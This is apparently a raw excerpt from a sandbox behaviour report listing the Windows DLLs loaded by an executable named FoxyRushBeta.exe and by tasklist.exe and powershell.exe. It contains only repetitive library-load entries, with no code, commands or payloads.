Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: windows.ui.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: windowmanagementapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: mmdevapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: devobj.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: mscms.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: coloradapterclient.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: ffmpeg.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: dbgcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: mf.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: mfplat.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: rtworkq.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: ffmpeg.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: dbgcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: kbdus.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: ffmpeg.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: dbgcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: kbdus.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: ffmpeg.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: dbgcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: kbdus.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: dxcore.dllJump to behavior
